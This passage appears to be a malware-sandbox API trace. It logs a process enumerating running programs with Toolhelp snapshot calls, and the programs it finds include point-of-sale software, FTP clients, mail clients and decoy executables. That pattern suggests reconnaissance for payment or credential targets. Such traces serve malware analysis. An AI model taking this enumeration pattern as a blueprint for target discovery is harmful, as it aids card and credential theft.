pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0289.806] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0289.807] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0289.836] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0289.841] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0289.842] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0289.844] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0289.845] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0289.847] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0289.849] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0289.850] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0289.852] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0289.853] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0289.855] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0289.856] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0289.861] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0289.862] CloseHandle (hObject=0x2170) returned 1 [0289.862] Sleep (dwMilliseconds=0x64) [0289.974] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0289.989] Process32First (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.991] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.992] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.994] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.995] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.000] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.001] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.003] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.004] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.006] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.007] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.009] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0290.010] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.079] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.081] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.082] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.084] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.086] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.090] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.091] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0290.093] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0290.094] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0290.096] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.097] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0290.099] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0290.100] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0290.101] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0290.103] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.104] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0290.106] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0290.110] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0290.112] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0290.114] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0290.116] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0290.118] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0290.119] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0290.121] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0290.163] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0290.165] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0290.166] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0290.168] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0290.169] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0290.173] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0290.174] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0290.176] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0290.177] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0290.178] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0290.180] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0290.181] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0290.183] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0290.187] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0290.189] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0290.190] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0290.191] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0290.193] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0290.194] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0290.196] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0290.198] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0290.218] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0290.220] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0290.221] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0290.223] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0290.225] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0290.226] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0290.228] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0290.230] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0290.232] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0290.233] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 